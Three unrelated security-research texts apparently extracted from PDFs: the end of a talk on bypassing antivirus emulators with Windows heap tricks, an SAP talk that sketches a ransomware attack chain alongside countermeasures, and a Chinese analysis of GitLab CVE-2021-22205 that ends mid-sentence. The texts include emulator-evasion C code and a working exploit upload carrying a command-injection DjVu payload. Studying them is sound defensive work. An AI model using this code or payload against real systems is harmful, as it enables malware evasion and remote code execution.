FindMimeFromData(x,x,x,x,x,x,x,x) -> 583D452D 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 583D4530 85D2 TEST EDX,EDX 583D4532 75 4D JNZ SHORT inetcomm.583D4581 583D4534 52 PUSH EDX 583D4535 52 PUSH EDX 583D4536 53 PUSH EBX 583D4537 E8 15E5FFFF CALL <JMP.&KERNEL32.LoadLibraryExA> 0012FEF8 58476EB0 皀GX |FileName = "urlmon.dll" 0012FEFC 00000000 .... |hFile = NULL 0012FF00 00000000 .... \Flags = 0 0012FF04 00000001 ... 0012FF08 00000000 .... Exploiting DLL Forwarding • Bypass • Kaspersky KIS2016 • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … Advanced Exploitation Techniques • Heap allocation/free • Windows memory heap mechanism is very complicated, typically the AV-Emulator allocates chunks of memory pool to simulate memory operations of malicious program. • Taking advantage of windows heap feature, the information of heap structure is predictable, but AV-Emulator does not have such simulation. Exploiting Windows heap management mechanism HLOCAL h1,h2,h3,h4,h5,h6; HANDLE hp; hp = HeapCreate(0,0x1000,0); h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16); h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,32); h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16); free h2 HeapFree(hp,0,h1); HeapFree(hp,0,h3); HeapFree(hp,0,h2); h4 = HeapAlloc(hp,HEAP_ZERO_MEMORY,60); if (h4 == h1) { printf("virurunning ...\n"); VirusRunning();} Block :16 Block :32 Block:16 Block :64 Exploiting Windows heap management mechanism After freeing h2 block that heap size = 32,the heap manager will review if there is a free heap block nearby h2 first, if so, it will be merged into heap block that size is 64 ,rather than adding h2 into the Freelist. Therefore, when allocate heap block that size is 64, it would use the merged heap block directly. We can predict the case that h4 == h1. Bypass • Norman Suite 11 • Bitdefender Anti-virus2016 • VBA32 \ • … Exploiting Windows heap management mechanism Furthermore, we modify the heap block pointer “Flink” and “Blink”. If do so, it would break the heap merging operation, lead to the failure of h4 allocation, but AV-Emulator does not simulate such behavior. Exploiting Windows heap management mechanism After freeing three heap blocks 0:000> !heap -a 01460000 Index Address Name Debugging options enabled 6: 01460000 Segment at 01460000 to 01470000 (00001000 bytes committed) Flags: 00001002 Heap entries for Segment00 in Heap 01460000 01460000: 00000 . 00588 [101] - busy (587) 01460588: 00588 . 00240 [101] - busy (23f) 014607c8: 00240 . 00818 [100] 01460fe0: 00818 . 00020 [111] - busy (1d) 01461000: 0000f000 - uncommitted bytes. Exploiting Windows heap management mechanism Before Flink /Blink modification 0:000> !heap -x 014607c8 Entry User Heap Segment Size PrevSize Unused Flags ----------------------------------------------------------------------------- 014607c8 014607d0 01460000 01460000 818 240 0 free Exploiting Windows heap management mechanism After Flink ,Blink modification 0:000> !heap -x 014607c8 List corrupted: (Blink->Flink = 014600c4) != (Block = 014607d0) HEAP 01460000 (Seg 01460000) At 014607c8 Error: block list entry corrupted Entry User Heap Segment Size PrevSize Unused Flags ----------------------------------------------------------------------------- 014607c8 014607d0 01460000 01460000 818 240 0 free Exploiting Windows heap management mechanism The heap manager would not be able to allocate new memory space to h4 anymore. But the AV-Emulator do not have such feature, thus we can bypass the emulator as below: Exploiting Windows heap management mechanism HeapFree(hp,0,h1); HeapFree(hp,0,h3); HeapFree(hp,0,h2); int diff = (16+8)+ (32+8) + (16+8); int nlink = (int)h1 + diff; *(int *)h1 = nlink; *((int *)h1+1) = nlink; h4 = HeapAlloc(hp,HEAP_ZERO_MEMORY,60); if (h4 == 0) { printf("virurunning ...\n"); VirusRunning(); } Exploiting Windows heap management mechanism +0x0c4 FreeLists: _LIST_ENTRY [ 0x4f07d0 - 0x4f07d0 ] 004f07c8 13f806e1 00004631 004f00c4 004f00c4 004f07d8 41414141 41414141 04010005 0800467a 004f07e8 42424242 42424242 42424242 42424242 004f07f8 42424242 42424242 42424242 42424242 004f0808 fb0000fb 00004671 004f00c4 004f00c4 004f0818 43434343 43434343 f80000f8 0000467a 004f0828 004f00c4 004f07d0 00000000 00000000 HEAP Offset 0xc4-FreeList h1:0X14607D0 h3:0x1460828 Exploiting Windows heap management mechanism +0x0c4 FreeLists: _LIST_ENTRY [ 0x4f07d0 - 0x4f07d0 ] 004f07c8 13f806e1 00004631 004f0828 004f0828 004f07d8 41414141 41414141 04010005 0800467a 004f07e8 42424242 42424242 42424242 42424242 004f07f8 42424242 42424242 42424242 42424242 004f0808 fb0000fb 00004671 004f00c4 004f00c4 004f0818 43434343 43434343 f80000f8 0000467a 004f0828 004f00c4 004f07d0 00000000 00000000 HEAP Offset 0xc4-FreeList h1:0X14607D0 h3:0x1460828 Exploiting Windows heap management mechanism • Ntdll.RtlpAllocateHeap fails on memory allocation 776a5f0d 8d4e08 lea ecx,[esi+8] 776a5f10 8b39 mov edi,dword ptr [ecx] 776a5f12 897db8 mov dword ptr [ebp-48h],edi 776a5f15 8b560c mov edx,dword ptr [esi+0Ch] 776a5f18 895598 mov dword ptr [ebp-68h],edx 776a5f1b 8b12 mov edx,dword ptr [edx] 776a5f1d 8b7f04 mov edi,dword ptr [edi+4] 776a5f20 3bd7 cmp edx,edi 776a5f22 0f85674a0200 jne ntdll!RtlpAllocateHeap+0x7a3 Exploiting Windows heap management mechanism • Ntdll.RtlpAllocateHeap fails on memory allocation. if ( v47 == *(_DWORD *)(*(_DWORD *)v120 + 4) && v47 == v120 ){… *(_DWORD *)(v44 + 120) -= v45; *(_DWORD *)v22 = v67; } goto LABEL_78; } v94 = v47; v93 = *(_DWORD *)(*(_DWORD *)v120 + 4); v92 = v120; v91 = v126; LABEL_252: RtlpLogHeapFailure(12, v91, v92, v93, v94, 0); FreeList : Flink Blink free.Block: Flink Blik Exploiting Windows heap management mechanism HeapFree(hp,0,h1); HeapFree(hp,0,h3); HeapFree(hp,0,h2); int diff = (16+8)+ (32+8) + (16+8); int nlink = (int)h1 + diff; *(int *)h1 = nlink; *((int *)h1+1) = nlink; h4 = HeapAlloc(hp,HEAP_ZERO_MEMORY,60); if (h4 == 0) { printf("virurunning ...\n"); VirusRunning(); } Exploiting Windows heap management mechanism If(h4 == 0) , we can bypass • Kaspersky KIS2016 • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … Advanced Exploitation Techniques •In fact, the bypass mechanism is quite simple, let's take a look at the code like this: Exploiting Windows heap management mechanism hp = HeapCreate(0,0x1000,0x10000); for (int i = 0 ; i < 10 ; i++) { h[i] = HeapAlloc(hp,HEAP_ZERO_MEMORY,8); } HeapFree(hp,0,h[0]); HeapFree(hp,0,h[2]); HeapFree(hp,0,h[4]); HLOCAL hfixed = h[4]; HLOCAL hx = HeapAlloc(hp,HEAP_ZERO_MEMORY,8); if (hx == hfixed ) { printf("virurunning ...\n"); VirusRunning(); } Advanced Exploitation Techniques • Life is tough, you can use a variety of tricks to distinguish AV-Emulator from real machine; • Any predictable information of heap allocation/free • Heap header information (After calling HeapFree) • Heap list operations like add, delete ,and break • Heapspray … Advanced Exploitation Techniques • The examples of heap operations indicate: • If we dig into any of the OS features, it probably can be used to bypass emulator. • At present, it is difficult to build a sophisticated AV-Emulator that runs like real machine • We have opened Pandora box. DEMO TIME • Bypass Kaspersky KIS16.0.1.445zh-hans-cn_full.exe • Other products End-point AV AV-Emulator Bypass Mitigation • It is not easy for AV-Emulator to mitigate bypass because of lack of effective countermeasures. • Take more effort on depth of static heuristic analysis in order to avoid the problems of condition or branch. • In order to protect the internal detection logic of AV-Emulator, the emulator is supposed to reject a huge amount of scanning requests in a very short time. Thank You! Q&&A neineit@gmalil.com http://www.vxjump.net Thanks to Bing Sun gives me some cool ideas. Thanks to Linxer talked about VM inside details with me.
pdf
DISCLAIMER • This publication contains references to the products of SAP AG. SAP, R/3, SAP NetWeaver and other SAP products. • Products and services mentioned herein are trademarks or registered trademarks of SAP AG in Germany, in the US and in several other countries all over the world. • SAP AG is neither the author nor the publisher of this publication and is not responsible for its content. The SAP Group shall not be liable for errors or omissions with respect to the materials. Vicxer, Inc. Is a registered Trademark. All rights reserved. Reproduction of this presentation without author’s consent is forbidden. JOR DAN SANTARSIERI VICXER’S FOUNDER Originally devoted to Penetration Testing, Vulnerability Research & Exploit writing, discovered several vulnerabilities in Oracle, SAP, IBM and many others. Speaker and trainer at Black-Hat, OWASP-US, Hacker Halted, YSTS, Insomni’hack, AusCERT, Sec-T, RootCon, Ekoparty, etc. I started researching ERP Software back in 2008. Had the honor to secure more than 1000 SAP implementations all around the globe, including Fortune-500 companies, military institutions and the biggest ONG on the planet. @ J S A N T A R S I E R I CHAPTER 02 Project ARSAP is Born CHAPTER 04 Ransomware and the Weaponization of Weaknesses CHAPTER 01 Brief Introduction to SAP CHAPTER 03 A Traditional Approach to Malware Distribution INTRODUCTION CHAPTER 01 A Brief Introduction to SAP WHAT IS SAP? • SAP stands for Systems Applications and Products in Data Processing. It is a German company founded in 1972 by ex-IBM employees. • SAP counts 88,500+ Employees Worldwide • SAP Has 378,000+ Customers • Is Present in More Than 180 Countries • Dominate the Market With 87% of Forbes Global 2000 • SAP ERP (Enterprise Resource Planning) • SAP BI (Business Intelligence) • SAP CRM (Customer Relationship Management) • SAP SRM (Supplier Relationship Management) TWO TYPES OF SAP SOLUTIONS ENTERPRISE SOLUTIONS SUPPORTING SOLUTIONS • SAP GRC (Government Risk and Compliance) • SAP Business Objects • SAP Mobile • SAP Cloud Connectors These Solutions, provide direct services to end users These Solutions support the operations of the Enterprise Solutions SAP NETWEAVER • Netweaver is the framework where SAP is built in. It is the most important technology so far as it synchronizes and regulates the operatory of the different SAP components • Netweaver is service oriented! and it is divided in two different stacks, ABAP & J2EE. Database Operating System SAP Business Logic SAP Application Layer SAP Netweaver System SAP Solution Base Infrastructure SAP NETWEAVER • Each stack counts with different services, some of them are shared between stacks, some others are not • Each one of those services will have its own protocol for communications. Some of them are open, but most of them are proprietary SAP USER CLIENTS • There are MANY ways that a regular user could use to connect to the SAP systems. The most popular ones are: • SAP GUI (SAP proprietary protocol, extra thick client, around 1.4Gb of size) • SAP Web Application Servers (ICM, Java HTTP, XSA) IN A FEW WORDS … • Why would someone attack your SAP implementation? Easy…. CHAPTER 02 A NEW BEGINNING “Project ARSAP is Born” ABOUT US WE ARE VICXER! • A company focused in securing the business critical applications and its adjacent infrastructure (SAP, Oracle Siebel and others) • All of our customers belong to the Fortune-500 Group • We do: Oracle & SAP Penetration Testing Cyber-Security Trainings Vulnerability Assessment and Management SAP Forensics & Many More! PROJECT ARSAP “Sometimes, reinventing the wheel makes sense” - Scenario • As a young company, we had the same challenges that everyone else has when they just start, getting new leads that could end-up in new customers • The approach that most companies take here, is to simply buy a list of businesses that are already running SAP, so they can try to “cold call” the CISO / security managers and pitch what they do • The success rate of this procedure is 1%, same success rate that the spammers get. Coincidence? I think not! • We said to ourselves, this cannot be the best possible way! there must be a more efficient way to tackle this challenge ……. and then the project ARSAP was born! PROJECT ARSAP “Sometimes, reinventing the wheel makes sense” - Scenario • We used search engines like Shodan, Google, Bing, ZoomEye to more “sketchy” and esoteric deep-web resources (deep-web search engines, private forums, etc.) in order to find the different SAP systems (ABAP, Java, Business Objects, HANA) that were already exposed to the Internet • We ended-up creating one “extractor” per each data-source, as we knew since the very beginning that the SAP map that we would obtain would be “alive”, meaning that the discovered SAP systems could come and go every-day (yes, people tend to expose non-productive SAP systems to the Internet too!) • Once we had a list of servers, we also had the necessity of categorizing and tagging the detected SAP systems for further analysis. Fortunately for us, the exposed SAP services were QUITE verbose! PROJECT ARSAP “Sometimes, reinventing the wheel makes sense” - Scenario • At this point, we did not only have the list of exposed SAP systems, but we were also able to classify them per the exposed SAP services, country & continent (of the server hosting the SAP system), SSL support and the different SAP / services version! • We used different techniques to discover what companies / individuals were behind the discovered assets. • Now, of course, we needed a way to prioritize our efforts on which potential clients we would contact first, so what we did offline, was to analyze the detected SAP services versions and compare them to our own vulnerability database. This exercise allowed us to also classify the SAPs per “potential” risk (as we did not actually trigger any attack probes) Are you intrigued about the results? PROJECT ARSAP “ARSAP By the Numbers” • We found more than 14k SAP Services PROJECT ARSAP “ARSAP By the Numbers” • We have identified the owners of 37.86% of the detected assets PROJECT ARSAP “ARSAP By the Numbers” • We also discovered that at least 27% of the detected assets were potentially vulnerable to critical and high criticity vulnerabilities like RCE, Directory Transversal, Arbitrary File uploads / Arbitrary File Reads • We ended up being highly surprised by our discoveries and we immediately started to think that a sufficiently skilled attacker could provoke the “next SAP tragedy” without much effort • How? you say, well, keep watching … YOU GOT EMAIL! CHAPTER 03 “A traditional approach to malware distribution” “A traditional approach to Malware distribution” – Thinking Like an Attacker • Think about it, if you were an attacker who has recollected the information that we highlighted on the previous slides, it would be trivial for you to enumerate email addresses from the people that works at the target company • You know that the target organization uses SAP, probably across the board • You know that the target organization has enough resources to acquire and use an SAP system. This indicates that the level of resources belonging to the company are high and the head-count is significant • Almost all the big companies, with good amount of resources and a lot of employees use SSO (Single Sign-on) to facilitate access to SAP YOU GOT EMAIL! “SAP Gui Scripts” • In SAP Words • By default, the execution of SAP GUI scripts is disabled, but in our experience, 90% of corporate users use this functionality to do performance and functional testing YOU GOT EMAIL! “SAP GUI Scripting is an automation interface that enhances the capabilities of SAP GUI. By using this interface, end users may automate repetitive tasks by running macro-like scripts” “SAP Gui Scripts” • The attacker has already harvested some corporate email accounts and is ready to send some malware • The distribution channel will be an email with a malicious SAP GUI Script attached to it • The attacker will leverage the privileges of the victim and use them to completely delete a table containing public debt, Robin Hood Style! YOU GOT EMAIL! WEAPONIZATION “You Got Email!” - Scenario USER’S VLAN SERVER’S VLAN SAP End-User Back-End SAP ABAP System Attacker “SAP Gui Scripts” - Prevention • If your organization is lucky enough to not need SAP Gui scripts, you could disable this functionality by making sure that the sapgui/user_scripting profile parameter is set to FALSE • As we mention before, most organizations cannot afford disabling SAP Gui scripts, but fear not, there is a valid workaround! • Leave the SAP Gui scripts enable and configure the script/user_scripting_per_user parameter to TRUE, then, just assign the authorization object S_SCR with value 16 to (only) the users that are allowed to use this functionality YOU GOT EMAIL! “SAP Gui Scripts” - Prevention • Also, at the client level, make sure you select the “Notify when a script attaches to SAP GUI” option, to get a warning from the SAP GUI whenever a scripts tries to be executed YOU GOT EMAIL! “Ransomware and the weaponization of weaknesses” CHAPTER 04 WEAPONIZATION & PREVENTION WEAPONIZATION “The Ransomware Approach” • One of our recurrent thoughts after having the complete picture of the SAPs that were exposed to the Internet was “If a ransomware hits the SAP systems exposed to the Internet, the results would be catastrophic” • We wanted to help, but before we could recommend some countermeasures, we needed to think how an attacker could try to take over these assets…. (in SAP, that is no easy tasks) • By studying past ransomwares, we discovered that most of them shared some “personality traits” • They were designed to hit hard • Quick lateral movement was gold • Avoiding “making noise” was not a priority • Open to “weaponize” (aka reutilize) previously reported vulnerabilities WEAPONIZATION “The Ransomware Approach” - Scenario DMZ INTERNAL NETWORK Front-End SAP Java Back-End SAP ABAP Attacker WEAPONIZATION “The Ransomware Approach” • The hypothetical malware will be divided in 5 phases • Each action / stage will be complemented with the technical attack / technique and the respective countermeasure • The full Ransomware / Malware wont be distributed for obvious reasons ;-) but we will show some code! Stage Action Intrusion Remote Command Execution via SAP Java Invoker Servlet Credential Gathering Decrypting SAP Secure Storage Lateral Movement Around DMZ SSH / Password Guessing / Brute-force via RFC DMZ Escape / Lateral Movement Around Adjacent Network Credential Reutilization using SOAPRFC / Master Password Ransom & Expansion Encrypt all the things!!! And bonus! WEAPONIZATION “The Ransomware Approach” - Intrusion • As other malwares like WannaCry, we will use a previously reported vulnerability and just weaponize the publicly available exploit. This makes sense as many sophisticated attackers already have “malware frameworks”, they just need a silver bullet and some vulnerable victims • Per our network diagram, on the first phase, we are going to take over the front-end SAP system that is located inside the DMZ • The exploit that we are going to use will allow us to execute operating system commands under the privileges of the operating system user that is running the SAP system. This vulnerability is due to a combination of a default misconfiguration and a security vulnerability in SAP • Modern versions of SAP are not vulnerable to this exploit, but according to our research, finding a vulnerable systems is easy enough (almost 3 out of 10!!!!) PREVENTION “The Ransomware Approach” - Countermeasures • To prevent the abuse of the InvokerServlet and the unauthenticated command execution, SAP Notes 1445998, 1589525 and 1624450 must be implemented on the affected assets • After the SAP security notes have been implemented, you need to be sure that the Invoker Servlet functionality is globally disabled. For that, use the SAP Java config-tool or open the Netweaver administrator webpage (nwa), go to Server Configurations, locate the servlet_jsp option and make sure EnableInvokerServletGlobally is set to False • WARNING !!! There is a known issue / bug in SAP that will prevent old versions to start after implementing this fix. Please read SAP Note 1467771, before disabling the InvokerServlet • Unfortunately, changes will only take effect once you restart your SAP systems WEAPONIZATION “The Ransomware Approach” – Getting some creds! • Once the ransomware’s target has been breached, the first thing that it needs to do is lateral movement • The easiest way to extract credentials from a SAP Java system is by opening an encrypted file called SAP J2EE Secure Storage • In the SAP Java systems, the secure storage is an encrypted container that lays on the file-system. This container is encrypted using 3-DES, a hardcoded key and an user key phrase which is defined at the installation time • The container holds the SAP’s database password and depending on the version, the SAP Java administrator password (which is usually the same one, aka Master Password) • The container is extremely trivial to decrypt …….. PREVENTION “The Ransomware Approach” – Countermeasures • Access to the SAP J2EE Secure Storage must be protected at all cost! • Files: Should only be accessible by the SAP’s operating system user, local administrators and global admins • Our selected encryption key phrase must be different from the SAP master password • The password for the SAP Administrator must be different from the SAP database user • /usr/sap/<SID>/SYS/global/security/data/SecStore.properties, • /usr/sap/<SID>/SYS/global/security/data/SecStore.key WEAPONIZATION “The Ransomware Approach” - Scenario DMZ INTERNAL NETWORK Front-End SAP Java Back-End SAP ABAP Attacker WEAPONIZATION “The Ransomware Approach” – Getting some creds! • The ransomware now has the ability to execute operating system commands under the privileges of the user running the SAP system, has full access to the local database and some important credentials for an eventual brute force • But this is not all….. In order to connect to other SAP systems of “different stacks” the SAP Java systems have a mechanism called JCO Destinations, these destinations might contain sensitive data such as client, username and password for remote systems (inside or outside the DMZ) • Finally, we should always test if the passwords that we got so far correspond to the SAP Master Password. We could do this via SSH or SMB WEAPONIZATION “The Ransomware Approach” – Master Password! • At the installation time, SAP will ask the user if he / she wants to assign a different password for the most important SAP accounts or use a Master Password • By default, the installer suggests the implementation of a Master Password • If the Master Password is selected, the most powerful SAP users like SAP*, DDIC, the SAP’s database user and the SAP OS administrator and the SAP OS service user will all share the same password • 95% of the surveyed companies use the SAP Master Password mechanism • If one password is compromised …. “A Screen that no one wants to see on their SAPs” THE FINAL RESULT PREVENTION “The Ransomware Approach” – Countermeasures • In order to protect your RFC destinations, first ask yourself the following question, do I have a real business need to create an RFC destination with hardcoded credentials? • If the answer is “Yes” because you need to interact with a poorly designed interface (quite common on the SAP world) the least privileged approach must be follow • Avoid the utilization of an SAP Master Password, each key account must have its own password, with such be in compliance to your local password policy • Review your firewall strategy, how are you connecting your SAP systems on the DMZ and from the DMZ to the adjacent network. Allow traffic to ONLY the services that you require and nothing else WEAPONIZATION “The Ransomware Approach” - Scenario DMZ INTERNAL NETWORK Front-End SAP Java Back-End SAP ABAP Attacker WEAPONIZATION “The Ransomware Approach” – Bonus Track • Now is time to leave the DMZ!. One of the most notable characteristics of SAP is that it has been born to be interconnected • We can safely assume that the RFC and the ICM ports will be accepting connections from the already compromised SAP systems on the DMZ • The malware will attack the ICM services on the adjacent network by trying to reutilize the obtained credentials. The attack will target a particularly vulnerable service called SOAPRFC • The malware will send fake messages from the SAP servers on the adjacent network to all the end-users (human beings) pretending to be the SAP administrators • The users will receive a pop-up saying that a new SAP add-on MUST be installed and if they do not proceed with the installation, they will “disrupt the SAP system” P O W E R P O I N T T E M P L A T E WHAT DID WE LEARN TODAY? A Few Take-Aways … • Always ask yourself, do I really need to expose my SAP system to the internet? If the answer is yes, you must ONLY expose the bare minimum • Use an SAP Web-dispatcher to restrict access to ALL the webpages that are not required by the business • Your Internet facing SAP systems must be patched! follow SAP’s security notes release cycle! (New patches are available the second Tuesday of each month) • Do not forget about the audit trails! They will be invaluable in case the worst happens • Make sure your SOC is “SAP Aware” • And finally….. Prevent, Prevent, Prevent, conduct penetration testings regularly, distrust default configurations and always use the least privileged approach when in doubt! It will pay-off in the future! WRAPPING-UP THAT IS ALL… QUESTIONS? To find out more about SAP, visit us at https://vicxer.com or follow us on Twitter @ J S A N T A R S I E R I @ V I C X E R S E C U R I T Y
pdf
1 CVE-OLON-OOOLS Gitlab 前台RCE 分析 之 L、 N、O L、起因 N、exiftool 的调⽤点 O、授权认证问题 与 CSRF P、扩展利⽤ 起因在于 有师傅私信提问了,所以周末研究了下,另外有 ⽂章第3部分是基于此篇的扩展,相⽐⽬前⼤ 家所熟知的利⽤会更简便也更通⽤。等明天另发⼀篇。 0、起因 2 从 Github 上搜 https://github.com/search?q=CVE-2021-22205 以及 绝⼤部分⼈使⽤的 ⼤家所熟 知的上传的 第⼆个 请求包⼤概如下 3 从这个请求包,第⼀直觉有两个问题。 1、gitlab 是如何调⽤ exiftool 的 2、/uploads/user 接⼝是如何做认证授权的 以及 CSRF 补丁在 workhorse/internal/upload/rewrite.go:180 1、exiftool 的调⽤点 Plain Text 复制代码 POST /uploads/user HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate Accept: application/json Connection: close X-CSRF-Token: g0heOBs+YzUAWceQolmjKrXO8nGNJkRV3oXYrnOkECztLMEGnoLeLmeDsR6MorfD2UIRO1Pt8TsXF OB70NCTwQ== Referer: http://127.0.0.1:3000//uploads/user Cookie: _gitlab_session_af96fb58ed2fa1b0750f77450f6ea19a32b8a66817cff2290ccd5d460dda8 777=8a02e014393906f0bff9fc22a2e2bc6e; experimentation_subject_id=eyJfcmFpbHMiOnsibWVzc2FnZSI6IkltRXdOREk1TWpJNExXRT BZVFV0TkdVNE9DMWlOekF4TFRJMlpUYzJNV1k1WlRNd1pTST0iLCJleHAiOm51bGwsInB1ciI6ImN vb2tpZS5leHBlcmltZW50YXRpb25fc3ViamVjdF9pZCJ9fQ%3D%3D- -42e8f07fbe964e06f9700f975a122a4dcb59fdc5; perf_bar_enabled=true Content-Length: 305 Content-Type: multipart/form-data; boundary=6dd36a93b958b399f3e98685816fadfa --6dd36a93b958b399f3e98685816fadfa Content-Disposition: form-data; name="file"; filename="b9c18b38-3e5d-11ec- b93b-1c36bbed31f3.jpg" Content-Type: image/jpeg AT&TFORM[DJVUINFO , BGjpANTa5(metadata (Copyright "\ " . qx{whoami} . \ " b ") ) --6dd36a93b958b399f3e98685816fadfa-- 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 4 在 handleExifUpload 中 新增对 图⽚格式 的检测 jpeg 以及 exif 5 从上图 可以看到 这⾏代码 在 gitlab-workhorse 中 workhorse/internal/upload/exif/exif.go:34 在 startProcessing 进⾏处理时调⽤ exiftool 触发了 rce Plain Text 复制代码 cleaner, err := exif.NewCleaner(ctx, r) 1 6 因此如果有做 ⼊侵检测的朋友,实际调⽤的⽗命令为 ⼀步步回溯调⽤链,可以追溯到 accelerate.go:20 中的 Accelerate 函数 2、授权认证问题 与 CSRF Plain Text 复制代码 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP- iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution - YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth - ImageSize -Copyright -CopyrightNotice -Orientation - 1 Plain Text 复制代码 workhorse/internal/upload/accelerate.go:20 Accelerate uploads.go: HandleFileUploads rewrite.go: rewriteFormFilesFromMultipart rewrite.go: handleFilePart rewrite.go: handleExifUpload rewrite.go: exif.NewCleaner exif.go: NewCleaner exif.go: startProcessing 1 2 3 4 5 6 7 8 7 ⽽从请求包出发 POST /uploads/user HTTP/1.1 对应的处理路由 在 gitlab-workhorse 中 workhorse/internal/upstream/routes.go:333 因此来看 workhorse/internal/upload/accelerate.go:20 Accelerate 调⽤为 ⽽ upload.Accelerate 对应的参数分别为 Go 复制代码 u.route("POST", userUploadPattern, upload.Accelerate(api, signingProxy, preparers.uploads)), 1 8 这边把 Accelerate 的代码格式下,相关参数 以及 对应的回调等看得清楚些 Go 复制代码 api =》 api := u.APIClient signingProxy =》 signingProxy := buildProxy(u.Backend, u.Version, signingTripper, u.Config, dependencyProxyInjector) preparers.uploads =》 preparers := createUploadPreparers(u.Config) func createUploadPreparers(cfg config.Config) uploadPreparers { defaultPreparer := upload.NewObjectStoragePreparer(cfg) return uploadPreparers{ artifacts: defaultPreparer, lfs: lfs.NewLfsUploadPreparer(cfg, defaultPreparer), packages: defaultPreparer, uploads: defaultPreparer, } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 Go 复制代码 func Accelerate(rails PreAuthorizer, h http.Handler, p Preparer) http.Handler { return rails.PreAuthorizeHandler( func(w http.ResponseWriter, r *http.Request, a *api.Response) { s := &SavedFileTracker{Request: r} opts, _, err := p.Prepare(a) if err != nil { helper.Fail500(w, r, fmt.Errorf("Accelerate: error preparing file storage options")) return } HandleFileUploads(w, r, h, a, s, opts) }, "/authorize" ) } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 9 因此 关注 u.APIClient 的 PreAuthorizeHandler u 即 upstream 其结构如下 因此在 workhorse/internal/api.go 中 有如下 Go 复制代码 import ( ... apipkg "gitlab.com/gitlab-org/gitlab/workhorse/internal/api" ... ) func newUpstream( ... up.APIClient = apipkg.NewAPI( up.Backend, up.Version, up.RoundTripper, ) ... ) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 10 11 把前⾯的 Accelerate 中的调⽤摘录到这边,对应到 Go 复制代码 func (api *API) PreAuthorizeHandler(next HandleFunc, suffix string) http.Handler { return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { httpResponse, authResponse, err := api.PreAuthorize(suffix, r) if httpResponse != nil { defer httpResponse.Body.Close() } if err != nil { helper.Fail500(w, r, err) return } // The response couldn't be interpreted as a valid auth response, so // pass it back (mostly) unmodified if httpResponse != nil && authResponse == nil { passResponseBack(httpResponse, w, r) return } httpResponse.Body.Close() // Free up the Puma thread copyAuthHeader(httpResponse, w) next(w, r, authResponse) }) } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 12 对应到 api.go 中的 PreAuthorizeHandler ,也即参数对应如下 跟⼊ PreAuthorizeHandler 中的 PreAuthorize 如下 Go 复制代码 rails.PreAuthorizeHandler( func(w http.ResponseWriter, r *http.Request, a *api.Response) { s := &SavedFileTracker{Request: r} opts, _, err := p.Prepare(a) if err != nil { helper.Fail500(w, r, fmt.Errorf("Accelerate: error preparing file storage options")) return } HandleFileUploads(w, r, h, a, s, opts) }, "/authorize" ) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 Go 复制代码 next => func(w http.ResponseWriter, r *http.Request, a *api.Response) { s := &SavedFileTracker{Request: r} opts, _, err := p.Prepare(a) if err != nil { helper.Fail500(w, r, fmt.Errorf("Accelerate: error preparing file storage options")) return } HandleFileUploads(w, r, h, a, s, opts) }, suffix => "/authorize" 1 2 3 4 5 6 7 8 9 10 11 12 13 14 Go 复制代码 httpResponse, authResponse, err := api.PreAuthorize(suffix, r) 1 13 Go 复制代码 // PreAuthorize performs a pre-authorization check against the API for the given HTTP request // // If `outErr` is set, the other fields will be nil and it should be treated as // a 500 error. // // If httpResponse is present, the caller is responsible for closing its body // // authResponse will only be present if the authorization check was successful func (api *API) PreAuthorize(suffix string, r *http.Request) (httpResponse *http.Response, authResponse *Response, outErr error) { authReq, err := api.newRequest(r, suffix) if err != nil { return nil, nil, fmt.Errorf("preAuthorizeHandler newUpstreamRequest: %v", err) } httpResponse, err = api.doRequestWithoutRedirects(authReq) if err != nil { return nil, nil, fmt.Errorf("preAuthorizeHandler: do request: %v", err) } defer func() { if outErr != nil { httpResponse.Body.Close() httpResponse = nil } }() requestsCounter.WithLabelValues(strconv.Itoa(httpResponse.StatusCode), authReq.Method).Inc() // This may be a false positive, e.g. for .../info/refs, rather than a // failure, so pass the response back if httpResponse.StatusCode != http.StatusOK || !validResponseContentType(httpResponse) { return httpResponse, nil, nil } authResponse = &Response{} // The auth backend validated the client request and told us additional // request metadata. We must extract this information from the auth // response body. if err := json.NewDecoder(httpResponse.Body).Decode(authResponse); err != nil { return httpResponse, nil, fmt.Errorf("preAuthorizeHandler: decode 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 14 在 api.newRequest(r, suffix) 中组装头部,并最终向 authorize 发起 API 请求。接受并处理 这个 API 请求的是 Gitlab rails-web组件中的 upload_action , ( 注 Rails框架是 MVC框架,关于 action、controller 等等⾃⾏搜索补⻬知识 Action 代码如下 app/controllers/concerns/uploads_actions.rb authorization response: %v", err) } return httpResponse, authResponse, nil } 40 41 42 43 Ruby 复制代码 module UploadsActions def authorize set_workhorse_internal_api_content_type authorized = uploader_class.workhorse_authorize( has_length: false, maximum_size: Gitlab::CurrentSettings.max_attachment_size.megabytes.to_i) render json: authorized rescue SocketError render json: _("Error uploading file"), status: :internal_server_error end def model strong_memoize(:model) { find_model } end ... def workhorse_authorize_request? action_name == 'authorize' end end 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 15 对应的 Controller 如下 https://guides.rubyonrails.org/action_controller_overview.html rail 的controller 中可以插⼊多个 filter , 所以 从 Gitlab 官⽅⽂档来看 https://docs.gitlab.com/ee/security/user_file_uploads.html 这⾥也是有意为 之,因为 图⽚等等通常会包含在 各类email 等需要读取的地⽅,因此默认情况下 